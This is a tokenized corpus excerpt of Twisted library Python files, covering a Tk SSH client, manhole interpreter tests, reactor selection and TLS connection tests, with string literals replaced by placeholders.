<EOL> class SSHClientFactory ( protocol . ClientFactory ) : <EOL> noisy = <NUM_LIT:1> <EOL> def stopFactory ( self ) : <EOL> reactor . stop ( ) <EOL> def buildProtocol ( self , addr ) : <EOL> return SSHClientTransport ( ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> tkMessageBox . showwarning ( '<STR_LIT>' , '<STR_LIT>' % ( reason . type , reason . value ) ) <EOL> class SSHClientTransport ( transport . SSHClientTransport ) : <EOL> def receiveError ( self , code , desc ) : <EOL> global exitStatus <EOL> exitStatus = '<STR_LIT>' % ( code , desc ) <EOL> def sendDisconnect ( self , code , reason ) : <EOL> global exitStatus <EOL> exitStatus = '<STR_LIT>' % ( code , reason ) <EOL> transport . SSHClientTransport . sendDisconnect ( self , code , reason ) <EOL> def receiveDebug ( self , alwaysDisplay , message , lang ) : <EOL> global options <EOL> if alwaysDisplay or options [ '<STR_LIT>' ] : <EOL> log . msg ( '<STR_LIT>' % message ) <EOL> def verifyHostKey ( self , pubKey , fingerprint ) : <EOL> goodKey = isInKnownHosts ( options [ '<STR_LIT:host>' ] , pubKey , { '<STR_LIT>' : None } ) <EOL> if goodKey == <NUM_LIT:1> : <EOL> return defer . succeed ( <NUM_LIT:1> ) <EOL> elif goodKey == <NUM_LIT:2> : <EOL> return defer . fail ( error . ConchError ( '<STR_LIT>' ) ) <EOL> else : <EOL> if options [ '<STR_LIT:host>' ] == self . transport . getPeer ( ) [ <NUM_LIT:1> ] : <EOL> host = options [ '<STR_LIT:host>' ] <EOL> khHost = options [ '<STR_LIT:host>' ] <EOL> else : <EOL> host = '<STR_LIT>' % ( options [ '<STR_LIT:host>' ] , <EOL> self . transport . getPeer ( ) [ <NUM_LIT:1> ] ) <EOL> khHost = '<STR_LIT>' % ( options [ '<STR_LIT:host>' ] , <EOL> self . transport . getPeer ( ) [ <NUM_LIT:1> ] ) <EOL> keyType = common . getNS ( pubKey ) [ <NUM_LIT:0> ] <EOL> ques = """<STR_LIT>""" % ( host , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } [ keyType ] , <EOL> fingerprint ) <EOL> ques += '<STR_LIT>' <EOL> return deferredAskFrame ( ques , <NUM_LIT:1> ) . addCallback ( self . _cbVerifyHostKey , pubKey , khHost , keyType ) <EOL> def _cbVerifyHostKey ( self , ans , pubKey , khHost , keyType ) : <EOL> if ans . lower ( ) not in ( '<STR_LIT:yes>' , '<STR_LIT>' ) : <EOL> return deferredAskFrame ( "<STR_LIT>" , <NUM_LIT:1> ) . addCallback ( self . _cbVerifyHostKey , pubKey , khHost , keyType ) <EOL> if ans . lower ( ) == '<STR_LIT>' : <EOL> frame . write ( '<STR_LIT>' ) <EOL> raise error . ConchError ( '<STR_LIT>' ) <EOL> try : <EOL> frame . write ( "<STR_LIT>" % ( khHost , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } [ keyType ] ) ) <EOL> known_hosts = open ( os . path . expanduser ( '<STR_LIT>' ) , '<STR_LIT:a>' ) <EOL> encodedKey = base64 . encodestring ( pubKey ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> known_hosts . write ( '<STR_LIT>' % ( khHost , keyType , encodedKey ) ) <EOL> known_hosts . close ( ) <EOL> except : <EOL> log . deferr ( ) <EOL> raise error . ConchError <EOL> def connectionSecure ( self ) : <EOL> if options [ '<STR_LIT:user>' ] : <EOL> user = options [ '<STR_LIT:user>' ] <EOL> else : <EOL> user = getpass . getuser ( ) <EOL> self . requestService ( SSHUserAuthClient ( user , SSHConnection ( ) ) ) <EOL> class SSHUserAuthClient ( userauth . SSHUserAuthClient ) : <EOL> usedFiles = [ ] <EOL> def getPassword ( self , prompt = None ) : <EOL> if not prompt : <EOL> prompt = "<STR_LIT>" % ( self . user , options [ '<STR_LIT:host>' ] ) <EOL> return deferredAskFrame ( prompt , <NUM_LIT:0> ) <EOL> def getPublicKey ( self ) : <EOL> files = [ x for x in options . identitys if x not in self . usedFiles ] <EOL> if not files : <EOL> return None <EOL> file = files [ <NUM_LIT:0> ] <EOL> log . msg ( file ) <EOL> self . usedFiles . append ( file ) <EOL> file = os . path . expanduser ( file ) <EOL> file += '<STR_LIT>' <EOL> if not os . path . exists ( file ) : <EOL> return <EOL> try : <EOL> return keys . Key . fromFile ( file ) . blob ( ) <EOL> except : <EOL> return self . getPublicKey ( ) <EOL> def getPrivateKey ( self ) : <EOL> file = os . path . expanduser ( self . usedFiles [ - <NUM_LIT:1> ] ) <EOL> if not os . path . exists ( file ) : <EOL> return None <EOL> try : <EOL> return defer . succeed ( keys . Key . fromFile ( file ) . keyObject ) <EOL> except keys . BadKeyError , e : <EOL> if e . args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> prompt = "<STR_LIT>" % self . usedFiles [ - <NUM_LIT:1> ] <EOL> return deferredAskFrame ( prompt , <NUM_LIT:0> ) . addCallback ( self . _cbGetPrivateKey , <NUM_LIT:0> ) <EOL> def _cbGetPrivateKey ( self , ans , count ) : <EOL> file = os . path . expanduser ( self . usedFiles [ - <NUM_LIT:1> ] ) <EOL> try : <EOL> return keys . Key . fromFile ( file , password = ans ) . keyObject <EOL> except keys . BadKeyError : <EOL> if count == <NUM_LIT:2> : <EOL> raise <EOL> prompt = "<STR_LIT>" % self . usedFiles [ - <NUM_LIT:1> ] <EOL> return deferredAskFrame ( prompt , <NUM_LIT:0> ) . addCallback ( self . _cbGetPrivateKey , count + <NUM_LIT:1> ) <EOL> class SSHConnection ( connection . SSHConnection ) : <EOL> def serviceStarted ( self ) : <EOL> if not options [ '<STR_LIT>' ] : <EOL> self . openChannel ( SSHSession ( ) ) <EOL> if options . localForwards : <EOL> for localPort , hostport in options . localForwards : <EOL> reactor . listenTCP ( localPort , <EOL> forwarding . SSHListenForwardingFactory ( self , <EOL> hostport , <EOL> forwarding . SSHListenClientForwardingChannel ) ) <EOL> if options . remoteForwards : <EOL> for remotePort , hostport in options . remoteForwards : <EOL> log . msg ( '<STR_LIT>' % <EOL> ( remotePort , hostport ) ) <EOL> data = forwarding . packGlobal_tcpip_forward ( <EOL> ( '<STR_LIT>' , remotePort ) ) <EOL> self . sendGlobalRequest ( '<STR_LIT>' , data ) <EOL> self . remoteForwards [ remotePort ] = hostport <EOL> class SSHSession ( channel . SSHChannel ) : <EOL> name = '<STR_LIT>' <EOL> def channelOpen ( self , foo ) : <EOL> self . escapeMode = <NUM_LIT:1> <EOL> c = session . SSHSessionClient ( ) <EOL> if options [ '<STR_LIT>' ] : <EOL> c . dataReceived = self . handleInput <EOL> else : <EOL> c . dataReceived = self . write <EOL> c . connectionLost = self . sendEOF <EOL> frame . callback = c . dataReceived <EOL> frame . canvas . focus_force ( ) <EOL> if options [ '<STR_LIT>' ] : <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , common . NS ( options [ '<STR_LIT>' ] ) ) <EOL> elif options [ '<STR_LIT>' ] : <EOL> if options [ '<STR_LIT>' ] : <EOL> term = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> winSize = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ptyReqData = session . packRequest_pty_req ( term , winSize , '<STR_LIT>' ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , ptyReqData ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , common . NS ( options [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> if not options [ '<STR_LIT>' ] : <EOL> term = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> winSize = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ptyReqData = session . packRequest_pty_req ( term , winSize , '<STR_LIT>' ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , ptyReqData ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . conn . transport . transport . setTcpNoDelay ( <NUM_LIT:1> ) <EOL> def handleInput ( self , char ) : <EOL> if char in ( '<STR_LIT:\n>' , '<STR_LIT:\r>' ) : <EOL> self . escapeMode = <NUM_LIT:1> <EOL> self . write ( char ) <EOL> elif self . escapeMode == <NUM_LIT:1> and char == options [ '<STR_LIT>' ] : <EOL> self . escapeMode = <NUM_LIT:2> <EOL> elif self . escapeMode == <NUM_LIT:2> : <EOL> self . escapeMode = <NUM_LIT:1> <EOL> if char == '<STR_LIT:.>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> reactor . stop ( ) <EOL> return <EOL> elif char == '<STR_LIT>' : <EOL> os . kill ( os . getpid ( ) , signal . SIGSTOP ) <EOL> return <EOL> elif char == '<STR_LIT:R>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> self . conn . transport . sendKexInit ( ) <EOL> return <EOL> self . write ( '<STR_LIT>' + char ) <EOL> else : <EOL> self . escapeMode = <NUM_LIT:0> <EOL> self . write ( char ) <EOL> def dataReceived ( self , data ) : <EOL> if options [ '<STR_LIT>' ] : <EOL> print repr ( data ) <EOL> frame . write ( data ) <EOL> def extReceived ( self , t , data ) : <EOL> if t == connection . EXTENDED_DATA_STDERR : <EOL> log . msg ( '<STR_LIT>' % len ( data ) ) <EOL> sys . stderr . write ( data ) <EOL> sys . stderr . flush ( ) <EOL> def eofReceived ( self ) : <EOL> log . msg ( '<STR_LIT>' ) <EOL> sys . stdin . close ( ) <EOL> def closed ( self ) : <EOL> log . msg ( '<STR_LIT>' % self ) <EOL> if len ( self . conn . channels ) == <NUM_LIT:1> : <EOL> reactor . stop ( ) <EOL> def request_exit_status ( self , data ) : <EOL> global exitStatus <EOL> exitStatus = int ( struct . unpack ( '<STR_LIT>' , data ) [ <NUM_LIT:0> ] ) <EOL> log . msg ( '<STR_LIT>' % exitStatus ) <EOL> def sendEOF ( self ) : <EOL> self . conn . sendEOF ( self ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run ( ) </s>
<s> """<STR_LIT>""" <EOL> import traceback <EOL> from twisted . trial import unittest <EOL> from twisted . internet import error , defer <EOL> from twisted . test . proto_helpers import StringTransport <EOL> from twisted . conch . test . test_recvline import _TelnetMixin , _SSHMixin , _StdioMixin , stdio , ssh <EOL> from twisted . conch import manhole <EOL> from twisted . conch . insults import insults <EOL> def determineDefaultFunctionName ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> <NUM_LIT:1> // <NUM_LIT:0> <EOL> except : <EOL> return traceback . extract_stack ( ) [ - <NUM_LIT:2> ] [ <NUM_LIT:2> ] <EOL> defaultFunctionName = determineDefaultFunctionName ( ) <EOL> class ManholeInterpreterTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_resetBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> interpreter = manhole . ManholeInterpreter ( None ) <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> interpreter . resetBuffer ( ) <EOL> self . assertFalse ( interpreter . buffer ) <EOL> class ManholeProtocolTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_interruptResetsInterpreterBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransport ( ) <EOL> terminal = insults . ServerProtocol ( manhole . Manhole ) <EOL> terminal . makeConnection ( transport ) <EOL> protocol = terminal . terminalProtocol <EOL> interpreter = protocol . interpreter <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> protocol . handle_INT ( ) <EOL> self . assertFalse ( interpreter . buffer ) <EOL> class WriterTests ( unittest . TestCase ) : <EOL> def testInteger ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT:1>" ) <EOL> def testDoubleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testSingleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleSingleQuotedString ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleDoubleQuotedString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testFunctionDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testClassDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> class ManholeLoopbackMixin : <EOL> serverProtocol = manhole . ColoredManhole <EOL> def wfd ( self , d ) : <EOL> return defer . waitForDeferred ( d ) <EOL> def testSimpleExpression ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT:2>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testTripleQuoteLineContinuation ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testFunctionDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testClassDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testException ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' + defaultFunctionName , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testControlC ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" + manhole . CTRL_C + <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def test_interruptDuringContinuation ( self ) : <EOL> """<STR_LIT>""" <EOL> continuing = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> def gotContinuation ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> interrupted = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_C ) <EOL> return interrupted <EOL> continuing . addCallback ( gotContinuation ) <EOL> def gotInterruption ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> continuing . addCallback ( gotInterruption ) <EOL> return continuing <EOL> def testControlBackslash ( self ) : <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> partialLine = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> def gotPartialLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_BACKSLASH ) <EOL> d = self . recvlineClient . onDisconnection <EOL> return self . assertFailure ( d , error . ConnectionDone ) <EOL> def gotClearedLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> return partialLine . addCallback ( gotPartialLine ) . addCallback ( gotClearedLine ) <EOL> @ defer . inlineCallbacks <EOL> def test_controlD ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_D + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( "<STR_LIT:\n>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_D ) <EOL> d = self . recvlineClient . onDisconnection <EOL> yield self . assertFailure ( d , error . ConnectionDone ) <EOL> @ defer . inlineCallbacks <EOL> def testControlL ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_L + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> def test_controlA ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> def test_controlE ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' + '<STR_LIT>' + '<STR_LIT:">' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> @ defer . inlineCallbacks <EOL> def test_deferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( <EOL> "<STR_LIT>" ) <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> class ManholeLoopbackTelnetTests ( _TelnetMixin , unittest . TestCase , ManholeLoopbackMixin ) : <EOL> pass <EOL> class ManholeLoopbackSSHTests ( _SSHMixin , unittest . TestCase , ManholeLoopbackMixin ) : <EOL> if ssh is None : <EOL> skip = "<STR_LIT>" <EOL> class ManholeLoopbackStdioTests ( _StdioMixin , unittest . TestCase , ManholeLoopbackMixin ) : <EOL> if stdio is None : <EOL> skip = "<STR_LIT>" <EOL> else : <EOL> serverProtocol = stdio . ConsoleManhole </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> __all__ = [ "<STR_LIT>" ] <EOL> from twisted . python . runtime import platform <EOL> def _getInstallFunction ( platform ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if platform . isLinux ( ) : <EOL> try : <EOL> from twisted . internet . epollreactor import install <EOL> except ImportError : <EOL> from twisted . internet . pollreactor import install <EOL> elif platform . getType ( ) == '<STR_LIT>' and not platform . isMacOSX ( ) : <EOL> from twisted . internet . pollreactor import install <EOL> else : <EOL> from twisted . internet . selectreactor import install <EOL> except ImportError : <EOL> from twisted . internet . selectreactor import install <EOL> return install <EOL> install = _getInstallFunction ( platform ) </s>
<s> import sys <EOL> from twisted . python import modules <EOL> modules . theSystemPath = modules . PythonPath ( [ ] , moduleDict = { } ) <EOL> from twisted . internet import gireactor <EOL> for name in gireactor . _PYGTK_MODULES : <EOL> if sys . modules [ name ] is not None : <EOL> sys . stdout . write ( "<STR_LIT>" % <EOL> ( name , sys . modules [ "<STR_LIT>" ] ) ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> try : <EOL> import gobject <EOL> except ImportError : <EOL> sys . stdout . write ( "<STR_LIT:success>" ) <EOL> else : <EOL> sys . stdout . write ( "<STR_LIT>" % ( gobject . __path__ , ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> __metaclass__ = type <EOL> from zope . interface import implementer <EOL> from twisted . python . compat import networkString <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . internet . test . reactormixins import ReactorBuilder <EOL> from twisted . internet . protocol import ServerFactory , ClientFactory , Protocol <EOL> from twisted . internet . interfaces import ( <EOL> IReactorSSL , ITLSTransport , IStreamClientEndpoint ) <EOL> from twisted . internet . defer import Deferred , DeferredList <EOL> from twisted . internet . endpoints import ( <EOL> SSL4ServerEndpoint , SSL4ClientEndpoint , TCP4ClientEndpoint ) <EOL> from twisted . internet . error import ConnectionClosed <EOL> from twisted . internet . task import Cooperator <EOL> from twisted . trial . unittest import SkipTest <EOL> from twisted . python . runtime import platform <EOL> from twisted . internet . test . test_core import ObjectModelIntegrationMixin <EOL> from twisted . internet . test . test_tcp import ( <EOL> StreamTransportTestsMixin , AbortConnectionMixin ) <EOL> from twisted . internet . test . connectionmixins import ( <EOL> EndpointCreator , ConnectionTestsMixin , BrokenContextFactory ) <EOL> try : <EOL> from OpenSSL . crypto import FILETYPE_PEM <EOL> except ImportError : <EOL> FILETYPE_PEM = None <EOL> else : <EOL> from twisted . internet . ssl import PrivateCertificate , KeyPair <EOL> from twisted . internet . ssl import ClientContextFactory <EOL> class TLSMixin : <EOL> requiredInterfaces = [ IReactorSSL ] <EOL> if platform . isWindows ( ) : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> skippedReactors = { <EOL> "<STR_LIT>" : msg , <EOL> "<STR_LIT>" : msg } <EOL> class ContextGeneratingMixin ( object ) : <EOL> import twisted <EOL> _pem = FilePath ( <EOL> networkString ( twisted . __file__ ) ) . sibling ( b"<STR_LIT:test>" ) . child ( b"<STR_LIT>" ) <EOL> del twisted <EOL> def getServerContext ( self ) : <EOL> """<STR_LIT>""" <EOL> pem = self . _pem . getContent ( ) <EOL> cert = PrivateCertificate . load ( <EOL> pem , KeyPair . load ( pem , FILETYPE_PEM ) , FILETYPE_PEM ) <EOL> return cert . options ( ) <EOL> def getClientContext ( self ) : <EOL> return ClientContextFactory ( ) <EOL> @ implementer ( IStreamClientEndpoint ) <EOL> class StartTLSClientEndpoint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wrapped , contextFactory ) : <EOL> self . wrapped = wrapped <EOL> self . contextFactory = contextFactory <EOL> def connect ( self , factory ) : <EOL> """<STR_LIT>""" <EOL> class WrapperFactory ( ServerFactory ) : <EOL> def buildProtocol ( wrapperSelf , addr ) : <EOL> protocol = factory . buildProtocol ( addr ) <EOL> def connectionMade ( orig = protocol . connectionMade ) : <EOL> protocol . transport . startTLS ( self . contextFactory ) <EOL> orig ( ) <EOL> protocol . connectionMade = connectionMade <EOL> return protocol <EOL> return self . wrapped . connect ( WrapperFactory ( ) ) <EOL> class StartTLSClientCreator ( EndpointCreator , ContextGeneratingMixin ) : <EOL> """<STR_LIT>""" <EOL> def server ( self , reactor ) : <EOL> """<STR_LIT>""" <EOL> return SSL4ServerEndpoint ( reactor , <NUM_LIT:0> , self . getServerContext ( ) ) <EOL> def client ( self , reactor , serverAddress ) : <EOL> """<STR_LIT>""" <EOL> return StartTLSClientEndpoint ( <EOL> TCP4ClientEndpoint ( <EOL> reactor , '<STR_LIT:127.0.0.1>' , serverAddress . port ) , <EOL> ClientContextFactory ( ) ) <EOL> class BadContextTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def _testBadContext ( self , useIt ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> exc = self . assertRaises ( <EOL> ValueError , useIt , reactor , BrokenContextFactory ( ) ) <EOL> self . assertEqual ( BrokenContextFactory . message , str ( exc ) ) <EOL> class StartTLSClientTestsMixin ( TLSMixin , ReactorBuilder , ConnectionTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> endpoints = StartTLSClientCreator ( ) <EOL> class SSLCreator ( EndpointCreator , ContextGeneratingMixin ) : <EOL> """<STR_LIT>""" <EOL> def server ( self , reactor ) : <EOL> """<STR_LIT>""" <EOL> return SSL4ServerEndpoint ( reactor , <NUM_LIT:0> , self . getServerContext ( ) ) <EOL> def client ( self , reactor , serverAddress ) : <EOL> """<STR_LIT>""" <EOL> return SSL4ClientEndpoint ( <EOL> reactor , '<STR_LIT:127.0.0.1>' , serverAddress . port , <EOL> ClientContextFactory ( ) ) <EOL> class SSLClientTestsMixin ( TLSMixin , ReactorBuilder , ContextGeneratingMixin , <EOL> ConnectionTestsMixin , BadContextTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> endpoints = SSLCreator ( ) <EOL> def test_badContext ( self ) : <EOL> """<STR_LIT>""" <EOL> def useIt ( reactor , contextFactory ) : <EOL> return reactor . connectSSL ( <EOL> "<STR_LIT:127.0.0.1>" , <NUM_LIT> , ClientFactory ( ) , contextFactory ) <EOL> self . _testBadContext ( useIt ) <EOL> def test_disconnectAfterWriteAfterStartTLS ( self ) : <EOL> """<STR_LIT>""" <EOL> class ShortProtocol ( Protocol ) : <EOL> def connectionMade ( self ) : <EOL> if not ITLSTransport . providedBy ( self . transport ) : <EOL> finished = self . factory . finished <EOL> self . factory . finished = None <EOL> finished . errback ( SkipTest ( "<STR_LIT>" ) ) <EOL> return <EOL> self . transport . startTLS ( self . factory . context ) <EOL> self . transport . write ( b"<STR_LIT:x>" ) <EOL> def dataReceived ( self , data ) : <EOL> self . transport . write ( b"<STR_LIT:y>" ) <EOL> self . transport . loseConnection ( ) <EOL> def connectionLost ( self , reason ) : <EOL> finished = self . factory . finished <EOL> if finished is not None : <EOL> self . factory . finished = None <EOL> finished . callback ( reason ) <EOL> reactor = self . buildReactor ( ) <EOL> serverFactory = ServerFactory ( ) <EOL> serverFactory . finished = Deferred ( ) <EOL> serverFactory . protocol = ShortProtocol <EOL> serverFactory . context = self . getServerContext ( ) <EOL> clientFactory = ClientFactory ( ) <EOL> clientFactory . finished = Deferred ( ) <EOL> clientFactory . protocol = ShortProtocol <EOL> clientFactory . context = self . getClientContext ( ) <EOL> clientFactory . context . method = serverFactory . context . method <EOL> lostConnectionResults = [ ] <EOL> finished = DeferredList ( <EOL> [ serverFactory . finished , clientFactory . finished ] , <EOL> consumeErrors = True ) <EOL> def cbFinished ( results ) : <EOL> lostConnectionResults . extend ( [ results [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , results [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ] ) <EOL> finished . addCallback ( cbFinished ) <EOL> port = reactor . listenTCP ( <NUM_LIT:0> , serverFactory , interface = '<STR_LIT:127.0.0.1>' ) <EOL> self . addCleanup ( port . stopListening ) <EOL> connector = reactor . connectTCP ( <EOL> port . getHost ( ) . host , port . getHost ( ) . port , clientFactory ) <EOL> self . addCleanup ( connector . disconnect ) <EOL> finished . addCallback ( lambda ign : reactor . stop ( ) ) <EOL> self . runReactor ( reactor ) <EOL> lostConnectionResults [ <NUM_LIT:0> ] . trap ( ConnectionClosed ) <EOL> lostConnectionResults [ <NUM_LIT:1> ] . trap ( ConnectionClosed ) <EOL> class TLSPortTestsBuilder ( TLSMixin , ContextGeneratingMixin , <EOL> ObjectModelIntegrationMixin , BadContextTestsMixin , <EOL> StreamTransportTestsMixin , ReactorBuilder ) : <EOL> """<STR_LIT>""" <EOL> def getListeningPort ( self , reactor , factory ) : <EOL> """<STR_LIT>""" <EOL> return reactor . listenSSL ( <NUM_LIT:0> , factory , self . getServerContext ( ) ) <EOL> def getExpectedStartListeningLogMessage ( self , port , factory ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( factory , port . getHost ( ) . port ) <EOL> def getExpectedConnectionLostLogMsg ( self , port ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( port . getHost ( ) . port , ) <EOL> def test_badContext ( self ) : <EOL> """<STR_LIT>""" <EOL> def useIt ( reactor , contextFactory ) : <EOL> return reactor . listenSSL ( <NUM_LIT:0> , ServerFactory ( ) , contextFactory ) <EOL> self . _testBadContext ( useIt ) <EOL> globals ( ) . update ( SSLClientTestsMixin . makeTestCaseClasses ( ) ) <EOL> globals ( ) . update ( StartTLSClientTestsMixin . 